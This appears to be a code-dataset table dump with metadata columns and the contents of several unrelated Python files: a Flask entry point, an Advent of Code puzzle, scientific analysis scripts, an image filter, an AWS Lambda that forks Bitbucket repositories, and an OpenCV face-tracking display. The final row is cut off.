hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4401048e9f96083e7a2404057ad05e3545075fdb | 173 | py | Python | run.py | BloomTech-Labs/tally-ai-ds | 09d7a207bf5e6f9de2d615ad078cebb8340abcd8 | [
"MIT"
] | 8 | 2020-01-08T18:16:20.000Z | 2020-06-30T23:49:38.000Z | run.py | Lambda-School-Labs/tally-ai-ds | 09d7a207bf5e6f9de2d615ad078cebb8340abcd8 | [
"MIT"
] | 5 | 2021-03-30T13:48:15.000Z | 2021-09-22T19:11:46.000Z | run.py | BloomTech-Labs/tally-ai-ds | 09d7a207bf5e6f9de2d615ad078cebb8340abcd8 | [
"MIT"
] | 5 | 2020-02-02T04:27:26.000Z | 2020-06-05T05:12:28.000Z | """ Entry point for the Yelp API Flask Reviews for Tally-ai"""
from yelpapi.app import create_app
APP = create_app()
if __name__=='__main__':
APP.run(host="0.0.0.0")
| 19.222222 | 62 | 0.693642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.468208 |
44012135b92e94a6e5cc6632123a24e83038d617 | 945 | py | Python | day6.py | xpqz/aoc-17 | 1872c13933b1b37e294d5e9660db3b2a48c837bd | [
"Apache-2.0"
] | null | null | null | day6.py | xpqz/aoc-17 | 1872c13933b1b37e294d5e9660db3b2a48c837bd | [
"Apache-2.0"
] | null | null | null | day6.py | xpqz/aoc-17 | 1872c13933b1b37e294d5e9660db3b2a48c837bd | [
"Apache-2.0"
] | null | null | null | from itertools import cycle
import re
def read_data(filename="data/input6.data"):
with open(filename) as f:
return [int(n) for n in re.findall(r"-?\d+", f.read())]
def maxindex(data):
m = data[0], 0
for i in range(len(data)):
if data[i] > m[0]:
m = data[i], i
return m
def bank_order(dlen, pivot):
spread = list(range(dlen))
if pivot == dlen:
return spread
return spread[pivot+1:] + spread[:pivot+1]
if __name__ == "__main__":
d = read_data()
count = 0
states = {tuple(d): 0}
while True:
m, pivot = maxindex(d)
d[pivot] = 0
for bank in cycle(bank_order(len(d), pivot)):
if m == 0:
break
d[bank] += 1
m -= 1
count += 1
state = tuple(d)
if state in states:
break
states[state] = count
print(count)
print(count - states[state])
| 19.6875 | 63 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.038095 |
44013f3f3af8e458590def0721c1609bc2e07d75 | 1,026 | py | Python | analysis/Therapy_abi-initialcondition.py | Harshavardhan-BV/Cancer-compe-strat | e4decacd5779e85a68c81d0ce3bedf42dea2964f | [
"MIT"
] | 1 | 2020-10-18T15:54:26.000Z | 2020-10-18T15:54:26.000Z | analysis/Therapy_abi-initialcondition.py | Harshavardhan-BV/Cancer-compe-strat | e4decacd5779e85a68c81d0ce3bedf42dea2964f | [
"MIT"
] | null | null | null | analysis/Therapy_abi-initialcondition.py | Harshavardhan-BV/Cancer-compe-strat | e4decacd5779e85a68c81d0ce3bedf42dea2964f | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import common_fn as cf
import seaborn as sns
plt.rcParams["svg.hashsalt"]=0
pre_path='EnvEq/All3/'
parm_format='{:.2e}'
parm_name='therapy_abi-Tneg_initratio-Totcell'
parm_name_array=['Tneg_initratio','Totcell']
post_path1='o2-Null_test-HE/'
parm_name1=parm_name+'/'+post_path1
cf.mkdirs(pre_path=pre_path,parm_name=parm_name1)
#iterator over these
ir_arr=np.logspace(-1,-3,5)
tot_cell_arr=np.array([1000,2000,4000])
cases=['No','AT','AT_nn','MT','SOC']
parms_array=np.empty([0,2])
for ir in ir_arr:
for tc in tot_cell_arr:
parms_array=np.append(parms_array,[[ir,tc]],axis=0)
for case in cases:
post_path=post_path1+case+'-'
cf.timeseries(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,post_path=post_path)
df=cf.eq_values(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,parm_name_array=parm_name_array,post_path=post_path,ttp=True,limit=9000)
| 34.2 | 177 | 0.774854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.159844 |
44046b1afd25c838028ace50bbff2629930820b6 | 745 | py | Python | batch/batch/globals.py | vrautela/hail | 7db6189b5b1feafa88452b8470e497d9505d9a46 | [
"MIT"
] | null | null | null | batch/batch/globals.py | vrautela/hail | 7db6189b5b1feafa88452b8470e497d9505d9a46 | [
"MIT"
] | null | null | null | batch/batch/globals.py | vrautela/hail | 7db6189b5b1feafa88452b8470e497d9505d9a46 | [
"MIT"
] | null | null | null | states = {'Pending', 'Ready', 'Creating', 'Running', 'Cancelled', 'Error', 'Failed', 'Success'}
complete_states = ('Cancelled', 'Error', 'Failed', 'Success')
valid_state_transitions = {
'Pending': {'Ready'},
'Ready': {'Creating', 'Running', 'Cancelled', 'Error'},
'Creating': {'Ready', 'Running'},
'Running': {'Ready', 'Cancelled', 'Error', 'Failed', 'Success'},
'Cancelled': set(),
'Error': set(),
'Failed': set(),
'Success': set(),
}
tasks = ('input', 'main', 'output')
memory_types = ('lowmem', 'standard', 'highmem')
HTTP_CLIENT_MAX_SIZE = 8 * 1024 * 1024
BATCH_FORMAT_VERSION = 6
STATUS_FORMAT_VERSION = 5
INSTANCE_VERSION = 22
MAX_PERSISTENT_SSD_SIZE_GIB = 64 * 1024
RESERVED_STORAGE_GB_PER_CORE = 5
| 26.607143 | 95 | 0.636242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 325 | 0.436242 |
4404ab7f872b125d775084569215a89c507428c5 | 8,037 | py | Python | decodense/tools.py | luna-component/decodense | 2579b7a3b7500b32ab231ebacb35c91e87e96735 | [
"MIT"
] | null | null | null | decodense/tools.py | luna-component/decodense | 2579b7a3b7500b32ab231ebacb35c91e87e96735 | [
"MIT"
] | null | null | null | decodense/tools.py | luna-component/decodense | 2579b7a3b7500b32ab231ebacb35c91e87e96735 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*
"""
tools module
"""
__author__ = 'Dr. Janus Juul Eriksen, University of Bristol, UK'
__maintainer__ = 'Dr. Janus Juul Eriksen'
__email__ = 'janus.eriksen@bristol.ac.uk'
__status__ = 'Development'
import sys
import os
import copy
import numpy as np
try:
import opt_einsum as oe
OE_AVAILABLE = True
except ImportError:
OE_AVAILABLE = False
from subprocess import Popen, PIPE
from pyscf import gto, scf, dft, symm, lib
from pyscf import tools as pyscf_tools
from typing import Tuple, List, Dict, Union
MAX_CYCLE = 100
NATORB_THRES = 1.e-12
class Logger(object):
"""
this class pipes all write statements to both stdout and output_file
"""
def __init__(self, output_file, both=True) -> None:
"""
init Logger
"""
self.terminal = sys.stdout
self.log = open(output_file, 'a')
self.both = both
def write(self, message) -> None:
"""
define write
"""
self.log.write(message)
if self.both:
self.terminal.write(message)
def flush(self) -> None:
"""
define flush
"""
pass
def git_version() -> str:
"""
this function returns the git revision as a string
"""
def _minimal_ext_cmd(cmd):
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = Popen(cmd, stdout=PIPE, env=env, \
cwd=os.path.dirname(__file__)).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
def dim(mo_occ: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
determine molecular dimensions
"""
return np.where(np.abs(mo_occ[0]) > 0.)[0], np.where(np.abs(mo_occ[1]) > 0.)[0]
def mf_info(mf: Union[scf.hf.SCF, dft.rks.KohnShamDFT]) -> Tuple[Tuple[np.ndarray, np.ndarray], \
Tuple[np.ndarray, np.ndarray]]:
"""
retrieve mf information (mo coefficients & occupations)
"""
# mo occupations
if np.asarray(mf.mo_occ).ndim == 1:
mo_occ = (np.ones(np.count_nonzero(0. < mf.mo_occ)), np.ones(np.count_nonzero(1. < mf.mo_occ)))
else:
mo_occ = (mf.mo_occ[0][np.nonzero(mf.mo_occ[0])], mf.mo_occ[1][np.nonzero(mf.mo_occ[1])])
# dimensions
alpha, beta = dim(mo_occ)
# mo coefficients
if np.asarray(mf.mo_coeff).ndim == 2:
mo_coeff = (mf.mo_coeff[:, alpha], mf.mo_coeff[:, beta])
else:
mo_coeff = (mf.mo_coeff[0][:, alpha], mf.mo_coeff[1][:, beta])
return mo_coeff, mo_occ
def orbsym(mol, mo_coeff):
"""
this functions returns orbital symmetries
"""
if isinstance(mo_coeff, np.ndarray):
if mo_coeff.ndim == 2:
try:
orbsymm = symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, mo_coeff)
except:
orbsymm = np.array(['A'] * mo_coeff.shape[1])
else:
try:
orbsymm = np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
except:
orbsymm = np.array([['A'] * c.shape[1] for c in mo_coeff])
else:
try:
orbsymm = np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
except:
orbsymm = np.array([['A'] * c.shape[1] for c in mo_coeff])
return orbsymm
def make_rdm1(mo: np.ndarray, occup: np.ndarray) -> np.ndarray:
"""
this function returns an 1-RDM (in ao basis) corresponding to given mo(s)
"""
return contract('ip,jp->ij', occup * mo, mo)
def make_natorb(mol: gto.Mole, mo_coeff: np.ndarray, \
rdm1: np.ndarray, thres: float = NATORB_THRES) -> Tuple[Tuple[np.ndarray, np.ndarray], \
Tuple[np.ndarray, np.ndarray]]:
"""
this function returns no coefficients and occupations corresponding
to given mo coefficients and rdm1
"""
# reshape mo_coeff and rdm1
if mo_coeff.ndim == 2:
c = np.asarray((mo_coeff,) * 2)
else:
c = mo_coeff
if rdm1.ndim == 2:
d = np.array([rdm1, rdm1]) * .5
else:
d = rdm1
# overlap matrix
s = mol.intor_symmetric('int1e_ovlp')
# ao to mo transformation of dm
rdm1_mo = contract('xpi,pq,xqr,rs,xsj->xij', c, s, d, s, c)
# diagonalize rdm1_mo
occ_no, u = np.linalg.eigh(rdm1_mo)
# transform to no basis
mo_no = contract('xip,xpj->xij', c, u)
# retain only significant nos
return (mo_no[0][:, np.where(np.abs(occ_no[0]) >= thres)[0]], mo_no[1][:, np.where(np.abs(occ_no[1]) >= thres)[0]]), \
(occ_no[0][np.where(np.abs(occ_no[0]) >= thres)], occ_no[1][np.where(np.abs(occ_no[1]) >= thres)])
def write_rdm1(mol: gto.Mole, part: str, \
mo_coeff: np.ndarray, mo_occ: np.ndarray, fmt: str, \
weights: List[np.ndarray], \
suffix: str = '') -> None:
"""
this function writes a 1-RDM as a numpy or cube (default) file
"""
# assertion
assert part == 'atoms', '`write_rdm1` function only implemented for `atoms` partitioning'
assert fmt in ['cube', 'numpy'], 'fmt arg to `write_rdm1` must be `cube` or `numpy`'
# molecular dimensions
alpha, beta = dim(mo_occ)
# compute total 1-RDM (AO basis)
rdm1_tot = np.array([make_rdm1(mo_coeff[0], mo_occ[0]), make_rdm1(mo_coeff[1], mo_occ[1])])
# loop over atoms
for a in range(mol.natm):
# atom-specific rdm1
rdm1_atom = np.zeros_like(rdm1_tot)
# loop over spins
for i, spin_mo in enumerate((alpha, beta)):
# loop over spin-orbitals
for m, j in enumerate(spin_mo):
# get orbital(s)
orb = mo_coeff[i][:, j].reshape(mo_coeff[i].shape[0], -1)
# orbital-specific rdm1
rdm1_orb = make_rdm1(orb, mo_occ[i][j])
# weighted contribution to rdm1_atom
rdm1_atom[i] += rdm1_orb * weights[i][m][a]
if fmt == 'cube':
# write rdm1_atom as cube file
pyscf_tools.cubegen.density(mol, f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.cube', \
np.sum(rdm1_atom, axis=0))
else:
# write rdm1_atom as numpy file
np.save(f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.npy', np.sum(rdm1_atom, axis=0))
def res_add(res_a, res_b):
"""
this function adds two result dictionaries
"""
return {key: res_a[key] + res_b[key] for key in res_a.keys()}
def res_sub(res_a, res_b):
"""
this function subtracts two result dictionaries
"""
return {key: res_a[key] - res_b[key] for key in res_a.keys()}
def contract(eqn, *tensors):
"""
interface to optimized einsum operation
"""
if OE_AVAILABLE:
return oe.contract(eqn, *tensors)
else:
return np.einsum(eqn, *tensors, optimize=True)
| 34.493562 | 126 | 0.528307 | 667 | 0.082991 | 0 | 0 | 0 | 0 | 0 | 0 | 2,125 | 0.264402 |
4409f782696f9bbe7a35ede6326445dc2cdc8431 | 949 | py | Python | needy/platforms/__init__.py | carlbrown/needy | 5a70726c9846f86a88be896ec39740296d503835 | [
"MIT"
] | 65 | 2015-07-21T01:40:17.000Z | 2019-06-10T10:46:28.000Z | needy/platforms/__init__.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 110 | 2015-07-21T01:41:40.000Z | 2017-01-18T23:13:30.000Z | needy/platforms/__init__.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 4 | 2015-07-20T02:45:43.000Z | 2016-07-31T21:48:39.000Z | import sys
from .generic import GenericPlatform
from .android import AndroidPlatform
from .osx import OSXPlatform
from .ios import iOSPlatform, iOSSimulatorPlatform
from .tvos import tvOSPlatform, tvOSSimulatorPlatform
from .windows import WindowsPlatform
def available_platforms():
platforms = [GenericPlatform, AndroidPlatform]
if sys.platform == 'darwin':
platforms.extend([
OSXPlatform,
iOSPlatform,
iOSSimulatorPlatform,
tvOSPlatform,
tvOSSimulatorPlatform,
])
elif sys.platform == 'win32':
platforms.append(WindowsPlatform)
ret = {}
for platform in platforms:
ret[platform.identifier()] = platform
return ret
def host_platform():
if sys.platform == 'darwin':
return OSXPlatform
elif sys.platform == 'win32':
return WindowsPlatform
return GenericPlatform
| 24.973684 | 54 | 0.650158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.031612 |
440a1d5175fa5348e4a99237450eda9219084497 | 1,932 | py | Python | starfish/pipeline/filter/white_tophat.py | joshmoore/starfish | db38168da35f01ad1541f67aebe49a083d12e224 | [
"MIT"
] | null | null | null | starfish/pipeline/filter/white_tophat.py | joshmoore/starfish | db38168da35f01ad1541f67aebe49a083d12e224 | [
"MIT"
] | null | null | null | starfish/pipeline/filter/white_tophat.py | joshmoore/starfish | db38168da35f01ad1541f67aebe49a083d12e224 | [
"MIT"
] | 1 | 2019-03-12T23:39:55.000Z | 2019-03-12T23:39:55.000Z | import numpy as np
from ._base import FilterAlgorithmBase
class WhiteTophat(FilterAlgorithmBase):
"""
Performs "white top hat" filtering of an image to enhance spots. "White top hat filtering" finds spots that are both
smaller and brighter than their surroundings.
See Also
--------
https://en.wikipedia.org/wiki/Top-hat_transform
"""
def __init__(self, disk_size, **kwargs):
"""Instance of a white top hat morphological masking filter which masks objects larger than `disk_size`
Parameters
----------
disk_size : int
diameter of the morphological masking disk in pixels
"""
self.disk_size = disk_size
@classmethod
def add_arguments(cls, group_parser):
group_parser.add_argument(
"--disk-size", default=15, type=int, help="diameter of morphological masking disk in pixels")
def filter(self, stack) -> None:
"""Perform in-place filtering of an image stack and all contained aux images
Parameters
----------
stack : starfish.Stack
Stack to be filtered
"""
from scipy.ndimage.filters import maximum_filter, minimum_filter
from skimage.morphology import disk
def white_tophat(image):
if image.dtype.kind != "u":
raise TypeError("images should be stored in an unsigned integer array")
structuring_element = disk(self.disk_size)
min_filtered = minimum_filter(image, footprint=structuring_element)
max_filtered = maximum_filter(min_filtered, footprint=structuring_element)
filtered_image = image - np.minimum(image, max_filtered)
return filtered_image
stack.image.apply(white_tophat)
# apply to aux dict too.
for auxiliary_image in stack.auxiliary_images.values():
auxiliary_image.apply(white_tophat)
| 33.310345 | 120 | 0.652174 | 1,870 | 0.967909 | 0 | 0 | 195 | 0.100932 | 0 | 0 | 841 | 0.4353 |
440b1a3e84c4b75ee948d622c559e449e45598fa | 8,082 | py | Python | lambda/lambda/avm-create-bitbucket-repo/avm-create-bitbucket.py | khiann/terraform-aws-avm | 9fbf3d97a26117450ad9e93c8f949727df4f562c | [
"MIT-0"
] | null | null | null | lambda/lambda/avm-create-bitbucket-repo/avm-create-bitbucket.py | khiann/terraform-aws-avm | 9fbf3d97a26117450ad9e93c8f949727df4f562c | [
"MIT-0"
] | null | null | null | lambda/lambda/avm-create-bitbucket-repo/avm-create-bitbucket.py | khiann/terraform-aws-avm | 9fbf3d97a26117450ad9e93c8f949727df4f562c | [
"MIT-0"
] | 1 | 2021-09-01T18:28:55.000Z | 2021-09-01T18:28:55.000Z | import json
import stashy
import avm_common
import urllib3
import boto3
import base64
from botocore.exceptions import ClientError
urllib3.disable_warnings()
# import pprint
# pp = pprint.PrettyPrinter(indent=4)
class gitMgr:
"""Class that manages access to bitbucket resources"""
def __init__(self):
self._token = self.get_token()
secret = self._token
self._stashy = stashy.connect(secret["url"],secret["user"], secret["password"], verify=False)
def get_token(self):
return avm_common.get_secret("bitbucket")
def get_repo(self, repo_name,project=None):
print(f"Get the repo {repo_name} in project {project}")
import inspect
try:
if project:
repos = [r for r in self._stashy.repos.all() if (r["name"] == repo_name and r["project"]["key"] == project)]
for r in repos:
print(f'{r["project"]["key"]}')
if len(repos) == 1:
print(f"Trying to find {repo_name} in {project}")
repo = self._stashy.projects[project].repos[repo_name]
#pp.pprint(inspect.getmembers(repo))
return repo
else:
repos = [r for r in self._stashy.repos.all() if r["name"] == repo_name ]
if len(repos) == 1:
project = repos[0]["project"]["key"]
print(f"Found {project}/{repo_name}")
return self._stashy.projects[project].repos[repo_name]
else:
return
except:
raise
def get_baseline_template_repo(self, repo_name):
print("starting get_baseline_template_repo function...")
baseline_map = {
"sandbox" : "sandbox-account",
"core_master_payer" : "core-master-payer",
"core_logging" : "core-logging",
"core_security" : "core-security",
"core_shared_services" : "core-shared-services",
"core_network" : "core-network",
"baseline" : "application-account",
"app" : "application-account"
}
baseline_key = None
for key in repo_name.split("-"):
if key in baseline_map.keys():
baseline_key = baseline_map[key]
break
return baseline_key
def fork_repo(self,source_repo_name,target_project,target_repo_name):
print("starting clone_repo function...")
# Steps
# 1. Check if repo exists
target_repo = self.get_repo(target_repo_name,target_project)
print(target_repo)
if not target_repo:
templates_project = avm_common.get_param("project_for_templates")
src_repo = self.get_repo(source_repo_name, templates_project)
if src_repo:
print(f"Create a new repo {target_repo_name} in {target_project}")
try:
response = src_repo.fork(target_repo_name,target_project)
return response
except stashy.errors.GenericException as e:
raise e
else:
print(f"{source_repo_name} repo not found")
else:
print(f"{target_repo_name} repo already exists. Nothing to fork")
def create_group(self, group):
"""Create a group in Bitbucket using the Stashy API."""
try:
return self._stashy.admin.groups.add(group)
except stashy.errors.GenericException as e:
# Does the group already exist (409)?
# Stashy can't handle it, so do it explicitly:
msg = e.data["errors"][0]["exceptionName"]
if (msg == "com.atlassian.bitbucket.IntegrityException"):
print(f"Group {group} already exists, not creating...")
else:
raise e
def grant_repository_access(self, project, repository, group, permission):
"""Grant a group access to a repository."""
try:
return self._stashy.projects[project].repos[repository].permissions.groups.grant(group, permission)
except stashy.errors.GenericException as e:
raise e
def get_repository_access_for_role(role_name, repository_type):
"""Return a Bitbucket permission level for a *role* (not a team) to a particular repository."""
access_for_roles = {
"tlz_admin": {
"baseline": "REPO_WRITE",
"resource": "REPO_ADMIN"
},
"tlz_developer": {
"baseline": "REPO_WRITE",
"resource": "REPO_WRITE"
},
"tlz_developer_ro": {
"baseline": "REPO_READ",
"resource": "REPO_READ"
}
}
try:
return access_for_roles[role_name][repository_type]
except KeyError:
return None
def lambda_handler(event, context):
repo_name = None
account_Id = event["AccountId"]
account_info = avm_common.get_account_details(account_Id)
account_details = account_info["org_details"]
#pp.pprint(account_details)
baseline_details = json.loads(account_details["baseline_details"])
account_type = account_details["accountType"]
baseline_repo = baseline_details["git"]
repo_name = baseline_repo.split("/")[-1].replace(".git","")
print(repo_name)
## Might want to make this a global variable
vended_baselines_project = avm_common.get_param("vended_baselines_project")
#project = "tlz-vb"
#pp.pprint(project.upper())
git = gitMgr()
template = git.get_baseline_template_repo(repo_name)
print(template)
# Create baseline repo
git.fork_repo(template,vended_baselines_project.upper(),repo_name)
#print(account_details)
try:
account_request = json.loads(account_details["account_request"])
environment_type = account_request["intEnvironment"].lower()
except Exception:
environment_type = "null"
user_managed_roles = avm_common.get_delegated_user_managed_roles()
group_list = avm_common.generate_okta_group_names(account_Id, account_type, environment_type, account_details["alias"].lower())
for group in group_list:
for role in user_managed_roles:
if group.endswith(role):
print(f"Group to be granted permissions to Bitbucket baseline repo: {group}")
git.create_group(group)
git.grant_repository_access(vended_baselines_project.upper(), repo_name, group, get_repository_access_for_role(role, "baseline"))
# TODO: Add merge check restriction
if avm_common.resource_workspace_required(account_type):
# Create an additional repo for the application and sandbox
# app-repo template
app_details = json.loads(account_details["app_details"])
print("App details")
print(app_details)
app_repo = app_details["git"]
repo_name = app_repo.split("/")[-1].replace(".git","")
print(repo_name)
vended_applications_project = avm_common.get_param("vended_applications_project")
template = f"{account_type.lower()}-resources"
git.fork_repo(template,vended_applications_project.upper(),repo_name)
for group in group_list:
for role in user_managed_roles:
if group.endswith(role):
print(f"Group to be granted permissions to Bitbucket resource repo: {group}")
git.grant_repository_access(vended_applications_project.upper(), repo_name, group, get_repository_access_for_role(role, "resource"))
if __name__ == "__main__":
from optparse import OptionParser
import pprint
import json
import sys
parser = OptionParser()
parser.add_option("-a", "--account_number", dest="account_number", help="Account number to test")
pp = pprint.PrettyPrinter(indent=4)
(options, args) = parser.parse_args(sys.argv)
pp.pprint(options)
event = { "AccountId": f"{options.account_number}"}
lambda_handler(event,None)
| 38.855769 | 152 | 0.623113 | 4,016 | 0.496907 | 0 | 0 | 0 | 0 | 0 | 0 | 2,262 | 0.279881 |
440b7babfdd9105d004432019375c7b06dd9899b | 6,905 | py | Python | artsci2019/display.py | fhennig/artsci-2019 | 273ea80cde5e4af0a9dfedbff608f29de4f78afa | [
"MIT"
] | 5 | 2019-05-27T10:00:18.000Z | 2020-01-23T13:22:37.000Z | artsci2019/display.py | fhennig/artsci-2019 | 273ea80cde5e4af0a9dfedbff608f29de4f78afa | [
"MIT"
] | 2 | 2019-05-21T16:05:28.000Z | 2019-05-26T14:52:22.000Z | artsci2019/display.py | fhennig/artsci-2019 | 273ea80cde5e4af0a9dfedbff608f29de4f78afa | [
"MIT"
] | null | null | null | import datetime
import cv2
import numpy as np
from artsci2019.lib.frame_checker import FrameChecker
from artsci2019.lib.util import scale_frame, scale_point, is_in_frame
from artsci2019.lib.face_recog import get_faces
from artsci2019.lib.sound import SoundPlayer
def draw_checked_frame(frame, checked_frame, factor):
green = (100, 255, 100)
red = (100, 100, 255)
eye_line_color = green if checked_frame.width_ok else red
cv2.line(frame,
scale_point(checked_frame.left_eye, factor),
scale_point(checked_frame.right_eye, factor),
eye_line_color,
thickness=2)
centre_line_color = green if checked_frame.centre_ok else red
cv2.line(frame,
scale_point(checked_frame.centre, factor),
scale_point(checked_frame.centre_target, factor),
centre_line_color,
thickness=4)
height_line_color = green if checked_frame.height_ok else red
cv2.line(frame,
scale_point(checked_frame.h_min_point, factor),
scale_point(checked_frame.h_max_point, factor),
height_line_color,
thickness=2)
def draw_triangles(frame, checked_frame, factor):
f_h, f_w, _ = checked_frame.recognized_frame.frame.shape
# prep delaunay
rect = (0, 0, f_w, f_h)
subdiv = cv2.Subdiv2D(rect)
for lm in checked_frame.recognized_frame.face_landmarks:
if is_in_frame(f_w, f_h, lm):
subdiv.insert(lm)
print("triangles: {}".format(len(subdiv.getTriangleList())))
for t in subdiv.getTriangleList():
t = np.reshape(t, (3, 2)).astype(np.int32)
pt1 = scale_point(tuple(t[0]), factor)
pt2 = scale_point(tuple(t[1]), factor)
pt3 = scale_point(tuple(t[2]), factor)
cv2.line(frame, pt1, pt2, (255, 255, 255), 1, 8, 0)
cv2.line(frame, pt2, pt3, (255, 255, 255), 1, 8, 0)
cv2.line(frame, pt3, pt1, (255, 255, 255), 1, 8, 0)
def my_get_frame(video_capture, rotate):
# get a single frame
rval, frame = video_capture.read()
if rotate:
frame = cv2.transpose(frame)
frame = cv2.flip(frame, flipCode=1)
return rval, frame
class InteractiveDisplay:
def __init__(self, camera_number, rotate, fullscreen, processing_backend):
self.camera_number = camera_number
self.rotate = rotate
self.fullscreen = fullscreen
self.debug_scaling = 1/2
if fullscreen:
self.debug_scaling = 1
self.scaling_factor = 4
self.preview_window = "preview"
self.genimage_window = "genimage"
self.genimage = None
self.video_capture = None
self.collected_frames = []
self.pb = processing_backend
self.current_checked_frames = []
self.checkpoint_time = datetime.datetime.now() + datetime.timedelta(seconds=10)
self.frame_checker = None
self.sound_player = SoundPlayer("bing.wav")
def init(self):
# initialize window
cv2.namedWindow(self.preview_window, cv2.WINDOW_NORMAL)
cv2.namedWindow(self.genimage_window, cv2.WINDOW_NORMAL) # WINDOW_NORMAL required for fullscreen to work
if self.fullscreen:
cv2.setWindowProperty(self.genimage_window, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# get webcam
self.video_capture = cv2.VideoCapture(self.camera_number)
self.video_capture.set(3, 1920)
self.video_capture.set(4, 1080)
rval = False
frame = None
if self.video_capture.isOpened(): # try to get the first frame
rval, frame = my_get_frame(self.video_capture, self.rotate)
if frame is not None:
self.genimage = scale_frame(frame, self.debug_scaling)
cv2.imshow(self.genimage_window, self.genimage)
if self.rotate:
self.frame_checker = FrameChecker(1080, 1920)
else:
self.frame_checker = FrameChecker(1920, 1080)
return rval
def teardown(self):
cv2.destroyWindow(self.preview_window)
cv2.destroyWindow(self.genimage_window)
self.video_capture.release()
def portrait_update(self, checked_frames):
current_time = datetime.datetime.now()
if current_time < self.checkpoint_time:
print("too early")
return # too early for an update
# update portrait
ok_frames = [cf.recognized_frame
for cf in checked_frames
if cf.all_ok]
changed = False
if ok_frames:
print("Updating")
self.sound_player.play()
changed = self.pb.update(ok_frames)
if changed:
print("Updated")
portrait_frame = self.pb.get_portrait()
f = scale_frame(portrait_frame, self.debug_scaling)
self.genimage = f
cv2.imshow(self.genimage_window, self.genimage)
self.checkpoint_time = current_time + datetime.timedelta(seconds=10)
return changed
def loop_update(self, frame):
frame = scale_frame(frame, self.debug_scaling)
new_preview = frame
new_genimage = self.genimage
current_time = datetime.datetime.now()
if current_time > self.checkpoint_time and self.current_checked_frames:
# draw face lines
score = max([cf.total_score for cf in self.current_checked_frames])
for cf in self.current_checked_frames:
print("Score: {}".format(cf.total_score))
new_genimage = cv2.addWeighted(self.genimage, 1 - score, frame, score, 0)
# draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
# draw_triangles(new_preview, self.current_checked_frames[0], self.debug_scaling)
if score > 0.5:
print("YO")
draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
# Display the resulting image
cv2.imshow(self.preview_window, new_preview)
cv2.imshow(self.genimage_window, new_genimage)
cv2.waitKey(50)
changed = self.portrait_update(self.current_checked_frames)
def start(self):
process_this_frame = True
rval = True
while rval:
# get a single frame
rval, frame = my_get_frame(self.video_capture, self.rotate)
# TODO drop frames while processing
# get the faces
if process_this_frame:
rfs = get_faces(frame, self.scaling_factor)
self.current_checked_frames = [self.frame_checker.check(rf) for rf in rfs]
process_this_frame = not process_this_frame
self.loop_update(frame)
# exit on ESC
key = cv2.waitKey(20)
if key == 113: # exit on q
break
| 35.777202 | 113 | 0.634757 | 4,715 | 0.682839 | 0 | 0 | 0 | 0 | 0 | 0 | 575 | 0.083273 |
440da21df1681ee860c03c4cbe74d77afefdd093 | 253 | py | Python | tests/examples/simple.py | Tiendil/coulson | 6ce12f10731930bf6931f73b752976aeda839cc4 | [
"BSD-3-Clause"
] | null | null | null | tests/examples/simple.py | Tiendil/coulson | 6ce12f10731930bf6931f73b752976aeda839cc4 | [
"BSD-3-Clause"
